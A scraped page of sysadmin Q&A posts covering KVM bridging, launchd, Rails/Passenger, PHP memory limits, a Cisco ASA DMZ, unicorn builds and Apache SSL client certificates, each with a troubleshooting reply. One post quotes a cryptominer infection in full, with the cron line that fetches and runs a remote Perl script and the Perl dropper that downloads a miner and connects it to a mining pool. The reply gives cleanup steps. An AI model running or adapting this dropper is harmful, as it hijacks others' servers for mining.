        auto eth0
        iface eth0 inet manual

        auto br0
        iface br0 inet static
            address xx.xx.xx.xx
            netmask 255.255.255.248
            gateway xx.xx.xx.xa
            bridge_ports eth0
            bridge_stp on
            bridge_fd 0
            bridge_maxwait 10

    Here's my /etc/network/interfaces on the guest, running Ubuntu 8.04:

        auto lo
        iface lo inet loopback

        auto eth0
        iface eth0 inet static
            address xx.xx.xx.xy
            netmask 255.255.255.248
            gateway xx.xx.xx.xa

    The two VMs can communicate with each other, but the guest VM can't reach anything in the outside world. Here's my /etc/libvirt/qemu/store_804.xml:

        <domain type='kvm'>
          <name>store_804</name>
          <uuid>27acfb75-4f90-a34c-9a0b-70a6927ae84c</uuid>
          <memory>2097152</memory>
          <currentMemory>2097152</currentMemory>
          <vcpu>2</vcpu>
          <os>
            <type arch='x86_64' machine='pc-0.12'>hvm</type>
            <boot dev='hd'/>
          </os>
          <features>
            <acpi/>
            <apic/>
            <pae/>
          </features>
          <clock offset='utc'/>
          <on_poweroff>destroy</on_poweroff>
          <on_reboot>restart</on_reboot>
          <on_crash>restart</on_crash>
          <devices>
            <emulator>/usr/bin/kvm</emulator>
            <disk type='file' device='disk'>
              <driver name='qemu' type='raw'/>
              <source file='/var/lib/libvirt/images/store_804.img'/>
              <target dev='hda' bus='ide'/>
            </disk>
            <disk type='block' device='cdrom'>
              <driver name='qemu' type='raw'/>
              <target dev='hdc' bus='ide'/>
              <readonly/>
            </disk>
            <interface type='bridge'>
              <mac address='52:54:00:26:0b:c6'/>
              <source bridge='br0'/>
              <model type='virtio'/>
            </interface>
            <console type='pty'>
              <target port='0'/>
            </console>
            <console type='pty'>
              <target port='0'/>
            </console>
            <input type='mouse' bus='ps2'/>
            <graphics type='vnc' port='-1' autoport='yes'/>
            <sound model='es1370'/>
            <video>
              <model type='cirrus' vram='9216' heads='1'/>
            </video>
          </devices>
        </domain>

    Any idea where I've gone wrong?
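
    Two things are worth checking on a dedicated/hosted box, sketched below with hedged commands: many providers filter unknown MAC addresses at the switch, so a bridged guest with its own MAC never gets answers from the gateway, and bridge_stp on can blackhole traffic for ~30 seconds after link-up while spanning tree converges:

        # from the guest: can the gateway even be ARPed? (arping is in the iputils-arping package)
        arping -c 3 xx.xx.xx.xa

        # on the host: confirm eth0 is enslaved and see which MACs the bridge has learned
        brctl show br0
        brctl showmacs br0

        # watch whether the gateway's replies ever arrive on the wire
        tcpdump -n -i eth0 host xx.xx.xx.xy

    If ARP from the guest's MAC goes unanswered while the host's own MAC works fine, it's the provider's MAC filtering; some hosts will register extra MACs for you, and otherwise routed/NAT networking with port forwards is the fallback. Turning spanning tree off (bridge_stp off) is also common for a single-uplink bridge.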

    Read the article

  • Automatically starting svnserve on Snow Leopard

    - by Cleggy
    I have installed Subversion onto my iMac running Snow Leopard, but am having trouble getting svnserve to start up automatically. As I understand it (I'm still fairly green with OS X), the best way to do that is to utilize launchd. To that end, I have created the following .plist file in the /Library/LaunchDaemons folder. If I use launchctl to execute this file, svnserve starts as expected, but it doesn't automatically start when the system starts up or I log in.

        <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
        <plist version="1.0">
        <dict>
            <key>Disabled</key>
            <false/>
            <key>Label</key>
            <string>org.tigris.subversion.svnserve</string>
            <key>UserName</key>
            <string>Dave</string>
            <key>ProgramArguments</key>
            <array>
                <string>/opt/subversion/bin/svnserve</string>
                <string>--inetd</string>
                <string>--root=/Users/Shared/SVNrep</string>
            </array>
            <key>ServiceDescription</key>
            <string>Subversion Standalone Server</string>
            <key>Sockets</key>
            <dict>
                <key>Listeners</key>
                <array>
                    <dict>
                        <key>SockFamily</key>
                        <string>IPv4</string>
                        <key>SockServiceName</key>
                        <string>svn</string>
                        <key>SockType</key>
                        <string>stream</string>
                    </dict>
                    <dict>
                        <key>SockFamily</key>
                        <string>IPv6</string>
                        <key>SockServiceName</key>
                        <string>svn</string>
                        <key>SockType</key>
                        <string>stream</string>
                    </dict>
                </array>
            </dict>
            <key>inetdCompatibility</key>
            <dict>
                <key>Wait</key>
                <false/>
            </dict>
        </dict>
        </plist>

    If anyone here could provide any suggestions as to how to get this to work, I'd really appreciate it.
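
    A couple of launchd details commonly bite here: LaunchDaemons plists must be owned by root:wheel and not group/world-writable, or launchd silently ignores them at boot, and a job loaded by hand is not persisted unless it was loaded with -w (or simply sits, valid and readable, in /Library/LaunchDaemons when the system starts). Hedged check commands:

        # launchd refuses LaunchDaemons with loose ownership/permissions
        sudo chown root:wheel /Library/LaunchDaemons/org.tigris.subversion.svnserve.plist
        sudo chmod 644 /Library/LaunchDaemons/org.tigris.subversion.svnserve.plist

        # validate the plist syntax
        plutil -lint /Library/LaunchDaemons/org.tigris.subversion.svnserve.plist

        # load it (clearing any disabled override) and confirm it registered
        sudo launchctl load -w /Library/LaunchDaemons/org.tigris.subversion.svnserve.plist
        sudo launchctl list | grep svnserve

    Note that with a Sockets block plus inetd compatibility, launchd starts svnserve on demand at the first connection rather than at boot, so seeing no svnserve process until a client connects is normal.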

    Read the article

  • Rails app deployment challenge, not finding database table in production.log

    - by Stefan M
    I'm trying to set up PasswordPusher as my first Ruby app ever. Building and running the WEBrick server as instructed in the README works fine. It was only when I tried to add Apache ProxyPass and ProxyPassReverse that page loads slowed down to several minutes. So I gave mod_passenger a whirl, but now it's unable to find the passwords table. Here's what I get in log/production.log:

        Started GET "/" for 10.10.2.13 at Sun Jun 10 08:07:19 +0200 2012
        Processing by PasswordsController#new as HTML
        Completed 500 Internal Server Error in 1ms

        ActiveRecord::StatementInvalid (Could not find table 'passwords'):
          app/controllers/passwords_controller.rb:77:in `new'
          app/controllers/passwords_controller.rb:77:in `new'

    In log/private.log I get a lot more output, so here's just a snippet; it looks to me like it's working with the database. (Edit: this was actually old log output, maybe from db:create.)

        Migrating to AddUserToPassword (20120220172426)
        (0.3ms) ALTER TABLE "passwords" ADD "user_id" integer
        (0.0ms) PRAGMA index_list("passwords")
        (0.2ms) CREATE INDEX "index_passwords_on_user_id" ON "passwords" ("user_id")
        (0.7ms) INSERT INTO "schema_migrations" ("version") VALUES ('20120220172426')
        (0.1ms) select sqlite_version(*)
        (0.1ms) SELECT "schema_migrations"."version" FROM "schema_migrations"
        (0.0ms) PRAGMA index_list("passwords")
        (0.0ms) PRAGMA index_info('index_passwords_on_user_id')
        (4.6ms) PRAGMA index_list("rails_admin_histories")
        (0.0ms) PRAGMA index_info('index_rails_admin_histories')
        (0.0ms) PRAGMA index_list("users")
        (4.8ms) PRAGMA index_info('index_users_on_unlock_token')
        (0.0ms) PRAGMA index_info('index_users_on_reset_password_token')
        (0.0ms) PRAGMA index_info('index_users_on_email')
        (0.0ms) PRAGMA index_list("views")

    In my vhost I have it set to use RailsEnv private:

        <VirtualHost *:80>
        #    ProxyPreserveHost on
        #    ProxyPass / http://10.220.100.209:180/
        #    ProxyPassReverse / http://10.220.100.209:180/
            DocumentRoot /var/www/pwpusher/public
            <Directory /var/www/pwpusher/public>
                allow from all
                Options -MultiViews
            </Directory>
            RailsEnv private
            ServerName pwpush.intranet
            ErrorLog /var/log/apache2/error.log
            LogLevel debug
            CustomLog /var/log/apache2/access.log combined
        </VirtualHost>

    My passenger.conf in mods-enabled is the Debian default:

        <IfModule mod_passenger.c>
            PassengerRoot /usr
            PassengerRuby /usr/bin/ruby
        </IfModule>

    In the Apache error.log I get something more cryptic:

        [Sun Jun 10 06:25:07 2012] [notice] Apache/2.2.16 (Debian) Phusion_Passenger/2.2.11 PHP/5.3.3-7+squeeze9 with Suhosin-Patch mod_ssl/2.2.16 OpenSSL/0.9.8o configured -- resuming normal operations
        /var/www/pwpusher/vendor/bundle/ruby/1.8/bundler/gems/modernizr-rails-09e9e6a92d67/lib/modernizr/rails/version.rb:3: warning: already initialized constant VERSION
        cache: [GET /] miss
        [Sun Jun 10 08:07:19 2012] [debug] mod_deflate.c(615): [client 10.10.2.13] Zlib: Compressed 728 to 423 : URL /
        /var/www/pwpusher/vendor/bundle/ruby/1.8/bundler/gems/modernizr-rails-09e9e6a92d67/lib/modernizr/rails/version.rb:3: warning: already initialized constant VERSION
        cache: [GET /] miss
        [Sun Jun 10 10:17:16 2012] [debug] mod_deflate.c(615): [client 10.10.2.13] Zlib: Compressed 728 to 423 : URL /

    Maybe that's routine stuff. I can see that the rake command created files in the app-root-relative db/ directory: I have private.sqlite3 and production.sqlite3, among others. And here's my config/database.yml:

        base: &base
          adapter: sqlite3
          timeout: 5000

        development:
          database: db/development.sqlite3
          <<: *base

        test:
          database: db/test.sqlite3
          <<: *base

        private:
          database: db/private.sqlite3
          <<: *base

        production:
          database: db/production.sqlite3
          <<: *base

    I've tried setting absolute paths in it, but that did not help.
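
    One telling detail: the failing request is logged in production.log, not private.log, which suggests the Passenger-served app is actually booting in the production environment, whose db/production.sqlite3 exists but may never have been migrated. A hedged pair of checks, assuming the app lives at /var/www/pwpusher:

        cd /var/www/pwpusher

        # make sure whichever environment Passenger really uses has the schema
        bundle exec rake db:migrate RAILS_ENV=production
        bundle exec rake db:migrate RAILS_ENV=private

        # Passenger must also be able to write the sqlite files; it runs the app
        # as the owner of config/environment.rb (www-data is an assumption here)
        ls -l config/environment.rb db/

    After changing RailsEnv in the vhost, an Apache reload plus touch tmp/restart.txt is needed before Passenger picks the new environment up.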

    Read the article

  • Unable to remove limit on memory usage for PHP script.

    - by Jess Telford
    The Situation: I am having an issue with a PHP script getting the following error message:

        Fatal error: Out of memory (allocated 359923712) (tried to allocate 72 bytes) in /path/to/piwik/core/DataTable.php on line 969

    The script I'm running is /path/to/piwik/misc/cron/archive.sh. I am assuming the numbers are bytes, which means the total is approximately 360MB. For all intents and purposes, I have increased the memory limits on the server well above 360MB, yet this is the number (give or take a byte) it consistently errors out at. Please note: This question is not about fixing a memory leak in the script, nor about why the script itself is using so much memory. The script is part of the Piwik archiving process, so I cannot just fix any memory leaks, etc. For more info on this script and why I am increasing the memory limit, see "How to setup auto archiving".

    The question: Given that the script is attempting to use over 360MB of memory, which I cannot change, why does it not seem possible for me to increase the amount of memory available to PHP on my server?

    What I've tried:

    Increasing PHP's memory_limit. Given the php.ini file:

        php -i | grep php.ini
        Configuration File (php.ini) Path => /usr/local/lib
        Loaded Configuration File => /usr/local/lib/php.ini

    I have edited that file so the memory_limit directive reads memory_limit = -1, restarted Apache, and checked that the new value has stuck:

        $ php -i | grep memory_limit
        memory_limit => -1 => -1

    I then run the script and get the same error. I've also tried 1G, 768M, etc., all to the same result (i.e., no change). Update 22nd June: Based on Vangel's help, I have attempted to set post_max_size to 20M in combination with setting memory_limit. Again, this has no effect.

    Removing the memory limit on child processes of Apache: I have found and edited the httpd.conf file to make sure there is no RLimitMEM directive. I then used WHM's Apache Configuration Memory Usage Restrictions to generate a restriction, which it claimed was at 1000M (and confirmed by checking httpd.conf). Both of these resulted in no change to the script erroring at 360MB.

    Increasing the per-process memory limits of Linux. The current limits set on the system:

        $ ulimit -m
        524288
        $ ulimit -v
        524288

    I have attempted to set both of these to unlimited:

        $ ulimit -m unlimited
        $ ulimit -v unlimited

    Once again, this has resulted in absolutely no improvement in my problem.

    My setup:

        $ cat /etc/redhat-release
        CentOS release 5.5 (Final)
        $ uname -a
        Linux example.com 2.6.18-164.15.1.el5 #1 SMP Wed Mar 17 11:30:06 EDT 2010 x86_64 x86_64 x86_64 GNU/Linux
        $ php -i | grep "PHP Version"
        PHP Version => 5.2.9
        $ httpd -V
        Server version: Apache/2.0.63
        Server built: Feb 2 2011 01:25:12
        Cpanel::Easy::Apache v3.2.0 rev5291
        Server's Module Magic Number: 20020903:13
        Server loaded: APR 0.9.17, APR-UTIL 0.9.15
        Compiled using: APR 0.9.17, APR-UTIL 0.9.15
        Architecture: 64-bit
        Server compiled with....
          -D APACHE_MPM_DIR="server/mpm/prefork"
          -D APR_HAS_SENDFILE
          -D APR_HAS_MMAP
          -D APR_HAVE_IPV6 (IPv4-mapped addresses enabled)
          -D APR_USE_SYSVSEM_SERIALIZE
          -D APR_USE_PTHREAD_SERIALIZE
          -D SINGLE_LISTEN_UNSERIALIZED_ACCEPT
          -D APR_HAS_OTHER_CHILD
          -D AP_HAVE_RELIABLE_PIPED_LOGS
          -D HTTPD_ROOT="/usr/local/apache"
          -D SUEXEC_BIN="/usr/local/apache/bin/suexec"
          -D DEFAULT_PIDLOG="logs/httpd.pid"
          -D DEFAULT_SCOREBOARD="logs/apache_runtime_status"
          -D DEFAULT_LOCKFILE="logs/accept.lock"
          -D DEFAULT_ERRORLOG="logs/error_log"
          -D AP_TYPES_CONFIG_FILE="conf/mime.types"
          -D SERVER_CONFIG_FILE="conf/httpd.conf"

    Output of php -i: http://pastebin.com/EiRut6Nm
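
    One gap in the attempts above: ulimit changes made in an interactive shell only affect processes started from that shell, and archive.sh is presumably kicked off by cron (or an already-running Apache), which never sees them. A hedged sketch of making the limit stick for the right process tree; the limits.conf entries assume pam_limits is how the box applies per-user caps:

        # check what limit the *cron* environment actually has, not your shell
        su - nobody -s /bin/bash -c 'ulimit -v'   # user name is a placeholder

        # persist higher caps (requires pam_limits), e.g. in /etc/security/limits.conf:
        #   *   soft   as   unlimited
        #   *   hard   as   unlimited

        # or raise the limit inline where the cron job is defined
        ulimit -v unlimited && /path/to/piwik/misc/cron/archive.sh

    Notably, 524288 KB of address space is 512MB; a 360MB PHP heap plus the interpreter and shared libraries plausibly hits exactly that ceiling.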

    Read the article

  • ./kernelupdates 100% CPU usage

    - by Vaibhav Panmand
    I have a CentOS 6 server running some WordPress and Tomcat websites. In the last two days it has been crashing continuously. After investigating, we found a kernelupdates binary consuming 100% CPU on the server. The process is:

        ./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.9 -p passxxx

    This is clearly not a valid kernel update. The server has probably been compromised and this process installed by an attacker, so I've killed the process and removed the apache user's cron entries. But somehow the process started again after a couple of hours, and the cron entries were also restored; I am searching for whatever is modifying the cron jobs. Does this process belong to a mining operation? How can we stop the cron-job modification and clean out the source of this process?

    Cron entry (apache user):

        */6 * * * * cd /tmp;wget http://updates.dyndn-web.com/.../abc.txt;curl -O http://updates.dyndn-web.com/.../abc.txt;perl abc.txt;rm -f abc* abc.txt

    The abc.txt payload:

        #!/usr/bin/perl
        system("killall -9 minerd");
        system("killall -9 PWNEDa");
        system("killall -9 PWNEDb");
        system("killall -9 PWNEDc");
        system("killall -9 PWNEDd");
        system("killall -9 PWNEDe");
        system("killall -9 PWNEDg");
        system("killall -9 PWNEDm");
        system("killall -9 minerd64");
        system("killall -9 minerd32");
        system("killall -9 named");
        $rn=1;
        $ar=`uname -m`;
        while($rn==1 || $rn==0) { $rn=int(rand(11)); }
        $exists=`ls /tmp/.ice-unix`;
        $cratch=`ps aux | grep -v grep | grep kernelupdates`;
        if($cratch=~/kernelupdates/gi) { die; }
        if($exists!~/minerd/gi && $exists!~/kernelupdates/gi) {
          $wig=`wget --version | grep GNU`;
          if(length($wig>6)) {
            if($ar=~/64/g) {
              system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
            } else {
              system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;wget http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
            }
          } else {
            if($ar=~/64/g) {
              system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/64.tar.gz;tar xzvf 64.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
            } else {
              system("mkdir /tmp;mkdir /tmp/.ice-unix;cd /tmp/.ice-unix;curl -O http://5.104.106.190/32.tar.gz;tar xzvf 32.tar.gz;mv minerd kernelupdates;chmod +x ./kernelupdates");
            }
          }
        }
        @prts=('8332','9091','1121','7332','6332','1332','9333','2961','8382','8332','9091','1121','7332','6332','1332','9333','2961','8382');
        $prt=0;
        while(length($prt)<4) { $prt=$prts[int(rand(19))-1]; }
        print "setup for $rn:$prt done :-)\n";
        system("cd /tmp/.ice-unix;./kernelupdates -B -o stratum+tcp://hk2.wemineltc.com:80 -u spdrman.".$rn." -p passxxx &");
        print "done!\n";

    Thanks in advance!
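
    For what it's worth, this is a Litecoin miner (minerd renamed to kernelupdates, pointed at a wemineltc.com stratum pool), re-seeded by the apache user's cron. Since it runs as apache, the re-infection vector is almost certainly a vulnerable WordPress plugin/theme or an uploaded webshell. A hedged containment sketch while the real entry point is found; rebuilding the host remains the only reliable cleanup:

        # freeze the persistence and the payload
        crontab -u apache -r
        rm -rf /tmp/.ice-unix
        pkill -9 -f kernelupdates

        # block the dropper and pool hosts named in the script
        iptables -A OUTPUT -d 5.104.106.190 -j DROP
        iptables -A OUTPUT -d updates.dyndn-web.com -j DROP

        # hunt for the web entry point: recently changed PHP files and odd uploads
        # (web root path is an assumption)
        find /var/www -name '*.php' -mtime -7 -ls
        grep -rl 'base64_decode' /var/www --include='*.php' | head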

    Read the article

  • Cannot open simple script application on Mac

    - by streetpc
    Mac OS X 10.6. I created a very simple app, which is only a wrapper around a shell script (so that I can select the script in application selectors, like startup apps). Yesterday it launched fine, but today I changed the executable script's content and name (to something that works perfectly when run as a shell script in Terminal) and now it will only display a Finder-iconed dialog saying "Cannot open the application because it is not supported on this kind of Mac." I restored the previous script (content and name) but I still get the error! The same happens when re-bundling the app from scratch, or completely changing the bundle identifier... If I try to open it from Terminal using open My.app, I get "The application cannot be opened because it has an incorrect executable format." But when I execute Contents/MacOS/Script directly, it always works (with both script contents). Also, the app is displayed with the correct icon and meta-information in the Finder (so I guess the Info.plist is understood). The app's file tree is:

        Contents/
            Info.plist
            MacOS/
                Script   (executable bit set, works when launched directly)
            PkgInfo
            Resources/
                AppIcon.icns

    Here is the Info.plist content:

        <?xml version="1.0" encoding="UTF-8"?>
        <!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
        <plist version="1.0">
        <dict>
            <key>CFBundleExecutable</key>
            <string>Script</string>
            <key>CFBundleIconFile</key>
            <string>AppIcon</string>
            <key>CFBundleIdentifier</key>
            <string>asdf.ScriptApp</string>
            <key>CFBundleInfoDictionaryVersion</key>
            <string>6.0</string>
            <key>CFBundleName</key>
            <string>My script</string>
            <key>CFBundlePackageType</key>
            <string>APPL</string>
            <key>CFBundleShortVersionString</key>
            <string>1.0</string>
            <key>CFBundleSignature</key>
            <string>????</string>
            <key>CFBundleVersion</key>
            <string>1</string>
            <key>LSMinimumSystemVersion</key>
            <string>10.4</string>
        </dict>
        </plist>

    And the PkgInfo file only contains APPL????. I tested the Script with a simple echo "ok" and echo "ok" >/tmp/test (plus the #!/bin/sh header). So my questions are: Is there some kind of validity caching for applications? Based on what? How do I flush it? Where does this message come from? I tried to google it but all I get is a page talking about 32/64-bit Java...
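
    There is indeed a cache: LaunchServices records what it decided about a bundle (including "wrong executable format") keyed on the bundle's path and identifier, which would explain why restoring the old script didn't help. Hedged commands to re-register the app and to rule out script-format gotchas that break launching while direct execution still works; the lsregister path is the standard 10.6 location:

        # force LaunchServices to re-evaluate the bundle
        /System/Library/Frameworks/CoreServices.framework/Frameworks/LaunchServices.framework/Support/lsregister -f /path/to/My.app

        # CRLF line endings corrupt the #! line when launched via LaunchServices
        file /path/to/My.app/Contents/MacOS/Script

        # quarantine or stray extended attributes can also block launching
        xattr -l /path/to/My.app/Contents/MacOS/Script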

    Read the article

  • I can't ping my DMZ zone from a local inside PC

    - by Big Denzel
    Hi everybody. Can anyone please help me with the following issue? I have a Cisco ASA 5520 configured on my network, and I can't ping the DMZ interface from a PC on the local inside network. The only place I can ping the DMZ from is the ASA itself; from there I can ping all three interfaces: inside, outside, and DMZ. But no PC on the inside network can access the DMZ. Can anyone please help? I thank you all in advance. Below is my Cisco ASA 5520 show run:

        ASA-FW# sh run
        : Saved
        :
        ASA Version 7.0(8)
        !
        hostname ASA-FW
        enable password encrypted
        passwd encrypted
        names
        dns-guard
        !
        interface GigabitEthernet0/0
         description "Link-To-GW-Router"
         nameif outside
         security-level 0
         ip address 41.223.156.109 255.255.255.248
        !
        interface GigabitEthernet0/1
         description "Link-To-Local-LAN"
         nameif inside
         security-level 100
         ip address 10.1.4.1 255.255.252.0
        !
        interface GigabitEthernet0/2
         description "Link-To-DMZ"
         nameif dmz
         security-level 50
         ip address 172.16.16.1 255.255.255.0
        !
        interface GigabitEthernet0/3
         shutdown
         no nameif
         no security-level
         no ip address
        !
        interface Management0/0
         description "Local-Management-Interface"
         no nameif
         no security-level
         ip address 192.168.192.1 255.255.255.0
        !
        ftp mode passive
        access-list OUT-TO-DMZ extended permit tcp any host 41.223.156.107 eq smtp
        access-list OUT-TO-DMZ extended permit tcp any host 41.223.156.106 eq www
        access-list OUT-TO-DMZ extended permit icmp any any log
        access-list OUT-TO-DMZ extended deny ip any any
        access-list inside extended permit tcp any any eq pop3
        access-list inside extended permit tcp any any eq smtp
        access-list inside extended permit tcp any any eq ssh
        access-list inside extended permit tcp any any eq telnet
        access-list inside extended permit tcp any any eq https
        access-list inside extended permit udp any any eq domain
        access-list inside extended permit tcp any any eq domain
        access-list inside extended permit tcp any any eq www
        access-list inside extended permit ip any any
        access-list inside extended permit icmp any any
        access-list dmz extended permit ip any any
        access-list dmz extended permit icmp any any
        access-list cap extended permit ip 10.1.4.0 255.255.252.0 172.16.16.0 255.255.255.0
        access-list cap extended permit ip 172.16.16.0 255.255.255.0 10.1.4.0 255.255.252.0
        no pager
        logging enable
        logging buffer-size 5000
        logging monitor warnings
        logging trap warnings
        mtu outside 1500
        mtu inside 1500
        mtu dmz 1500
        no failover
        asdm image disk0:/asdm-508.bin
        no asdm history enable
        arp timeout 14400
        global (outside) 1 interface
        nat (inside) 1 0.0.0.0 0.0.0.0
        static (dmz,outside) tcp 41.223.156.106 www 172.16.16.80 www netmask 255.255.255.255
        static (dmz,outside) tcp 41.223.156.107 smtp 172.16.16.25 smtp netmask 255.255.255.255
        static (inside,dmz) 10.1.0.0 10.1.16.0 netmask 255.255.252.0
        access-group OUT-TO-DMZ in interface outside
        access-group inside in interface inside
        access-group dmz in interface dmz
        route outside 0.0.0.0 0.0.0.0 41.223.156.108 1
        timeout xlate 3:00:00
        timeout conn 1:00:00 half-closed 0:10:00 udp 0:02:00 icmp 0:00:02
        timeout sunrpc 0:10:00 h323 0:05:00 h225 1:00:00 mgcp 0:05:00
        timeout mgcp-pat 0:05:00 sip 0:30:00 sip_media 0:02:00
        timeout uauth 0:05:00 absolute
        http server enable
        http 10.1.4.0 255.255.252.0 inside
        no snmp-server location
        no snmp-server contact
        snmp-server enable traps snmp authentication linkup linkdown coldstart
        crypto ipsec security-association lifetime seconds 28800
        crypto ipsec security-association lifetime kilobytes 4608000
        telnet timeout 5
        ssh timeout 5
        console timeout 0
        management-access inside
        !
        class-map inspection_default
         match default-inspection-traffic
        !
        !
        policy-map global_policy
         class inspection_default
          inspect dns maximum-length 512
          inspect ftp
          inspect h323 h225
          inspect h323 ras
          inspect netbios
          inspect rsh
          inspect rtsp
          inspect skinny
          inspect esmtp
          inspect sqlnet
          inspect sunrpc
          inspect tftp
          inspect sip
          inspect xdmcp
        !
        service-policy global_policy global
        Cryptochecksum:
        : end
        ASA-FW#

    Please help. Big Denzel
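
    Two things in this config look worth a hedged check. First, the only inside-to-dmz NAT is static (inside,dmz) 10.1.0.0 10.1.16.0, which does not cover the actual inside subnet 10.1.4.0/22, so inside hosts may have no valid translation toward the DMZ; an identity static for the real subnet is the usual fix. Second, ICMP is not in the inspection policy, so echo replies are not automatically allowed back through the stateful engine. A sketch to verify against your addressing plan before applying:

        ! identity NAT so 10.1.4.0/22 appears unchanged in the DMZ
        static (inside,dmz) 10.1.4.0 10.1.4.0 netmask 255.255.252.0

        ! make the ASA track ICMP echo/reply like a stateful session
        policy-map global_policy
         class inspection_default
          inspect icmp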

    Read the article

  • Unicorn installation error on Debian 5

    - by Luc
    I am running Ruby 1.9 on Debian 5, and did not manage to install unicorn with RubyGems. I got this error and do not really know how to solve it. Do you have any idea of the possible root cause?

        > gem install unicorn
        Building native extensions. This could take a while...
        ERROR: Error installing unicorn:
        ERROR: Failed to build gem native extension.

        /usr/bin/ruby1.9 extconf.rb
        checking for CLOCK_MONOTONIC in time.h... yes
        checking for clockid_t in time.h... yes
        checking for clock_gettime() in -lrt... yes
        checking for t_open() in -lnsl... no
        checking for socket() in -lsocket... no
        checking for poll() in poll.h... yes
        checking for getaddrinfo() in sys/types.h,sys/socket.h,netdb.h... yes
        checking for getnameinfo() in sys/types.h,sys/socket.h,netdb.h... yes
        checking for struct sockaddr_storage in sys/types.h,sys/socket.h... yes
        checking for accept4() in sys/socket.h... no
        checking for sys/select.h... yes
        checking for ruby/io.h... yes
        checking for rb_io_t.fd in ruby.h,ruby/io.h... yes
        checking for rb_io_t.mode in ruby.h,ruby/io.h... yes
        checking for rb_io_t.pathv in ruby.h,ruby/io.h... no
        checking for struct RFile in ruby.h,ruby/io.h... yes
        checking size of struct RFile in ruby.h,ruby/io.h... 24
        checking for struct RObject... no
        checking size of int... 4
        checking for rb_io_ascii8bit_binmode()... no
        checking for rb_thread_blocking_region()... yes
        checking for rb_thread_io_blocking_region()... no
        checking for rb_str_set_len()... yes
        checking for rb_time_interval()... yes
        checking for rb_wait_for_single_fd()... no
        creating Makefile

        make
        cc -I. -I/usr/include/ruby-1.9.0/x86_64-linux -I/usr/include/ruby-1.9.0 -I. -DHAVE_TYPE_CLOCKID_T -DHAVE_POLL -DHAVE_GETADDRINFO -DHAVE_GETNAMEINFO -DHAVE_TYPE_STRUCT_SOCKADDR_STORAGE -DHAVE_SYS_SELECT_H -DHAVE_RUBY_IO_H -DHAVE_RB_IO_T_FD -DHAVE_ST_FD -DHAVE_RB_IO_T_MODE -DHAVE_ST_MODE -DHAVE_TYPE_STRUCT_RFILE -DSIZEOF_STRUCT_RFILE=24 -DSIZEOF_INT=4 -DHAVE_RB_THREAD_BLOCKING_REGION -DHAVE_RB_STR_SET_LEN -DHAVE_RB_TIME_INTERVAL -D_GNU_SOURCE -DPOSIX_C_SOURCE=1-D_POSIX_C_SOURCE=200112L -fPIC -fno-strict-aliasing -g -g -O2 -O2 -g -Wall -Wno-parentheses -fPIC -o kgio_ext.o -c kgio_ext.c
        [the same compiler invocation repeats for autopush.o, wait.o, connect.o, and poll.o]
        poll.c:11:18: error: st.h: No such file or directory
        poll.c: In function 'do_poll':
        poll.c:148: error: 'RUBY_UBF_IO' undeclared (first use in this function)
        poll.c:148: error: (Each undeclared identifier is reported only once
        poll.c:148: error: for each function it appears in.)
        make: *** [poll.o] Error 1

        Gem files will remain installed in /usr/lib/ruby/gems/1.9.0/gems/kgio-2.5.0 for inspection.
        Results logged to /usr/lib/ruby/gems/1.9.0/gems/kgio-2.5.0/ext/kgio/gem_make.out
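
    The extension that actually fails to build is kgio (a unicorn dependency), and both errors point at incomplete or too-old Ruby 1.9.0 headers: st.h and RUBY_UBF_IO come from the interpreter's development files, and Debian 5's ruby1.9 package is 1.9.0, which current kgio releases no longer target. Two hedged ways out; the package name is the lenny-era one, so treat it as an assumption:

        # make sure the 1.9 development headers are present
        apt-get install ruby1.9-dev
        gem install unicorn

    If 1.9.0 itself is the problem, building a current Ruby 1.9.2+ from source (or via rvm) and installing unicorn against that is the more reliable path.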

    Read the article

  • ScriptAlias makes requests match too many Location blocks. What is going on?

    - by brain99
    We wish to restrict access on our development server to those users who have a valid SSL client certificate. We are running Apache 2.2.16 on Debian 6. However, for some sections (mainly git-http, set up with gitolite on https://my.server/git/) we need an exception, since many git clients don't support SSL client certificates. I have succeeded in requiring client-cert authentication for the server, and in adding exceptions for some locations. However, it seems this does not work for git. The current setup is as follows:

        SSLCACertificateFile ssl-certs/client-ca-certs.crt

        <Location />
            SSLVerifyClient require
            SSLVerifyDepth 2
        </Location>

        # this works
        <Location /foo>
            SSLVerifyClient none
        </Location>

        # this does not
        <Location /git>
            SSLVerifyClient none
        </Location>

    I have also tried an alternative solution, with the same results:

        # require authentication everywhere except /git and /foo
        <LocationMatch "^/(?!git|foo)">
            SSLVerifyClient require
            SSLVerifyDepth 2
        </LocationMatch>

    In both these cases, a user without a client certificate can perfectly well access my.server/foo/, but not my.server/git/ (access is refused because no valid client certificate is given). If I disable SSL client certificate authentication completely, my.server/git/ works fine.

    The ScriptAlias problem: gitolite is set up using the ScriptAlias directive. I have found that the problem occurs with any similar ScriptAlias:

        # Gitolite
        ScriptAlias /git/ /path/to/gitolite-shell/
        ScriptAlias /gitmob/ /path/to/gitolite-shell/

        # My test
        ScriptAlias /test/ /path/to/test/script/

    Note that /path/to/test/script is a file, not a directory; the same goes for /path/to/gitolite-shell/. My test script simply prints out the environment, super simple:

        #!/usr/bin/perl
        print "Content-type:text/plain\n\n";
        print "TEST\n";
        @keys = sort(keys %ENV);
        foreach (@keys) {
            print "$_ => $ENV{$_}\n";
        }

    It seems that if I go to https://my.server/test/someLocation, any SSLVerifyClient directives are applied that sit in Location blocks matching /test/someLocation or just /someLocation. If I have the following config:

        <LocationMatch "^/f">
            SSLVerifyClient require
            SSLVerifyDepth 2
        </LocationMatch>

    then the following URL requires a client certificate: https://my.server/test/foo. However, the following URL does not: https://my.server/test/somethingElse/foo. Note that this only seems to apply to SSL configuration. The following has no effect whatsoever on https://my.server/test/foo:

        <LocationMatch "^/f">
            Order allow,deny
            Deny from all
        </LocationMatch>

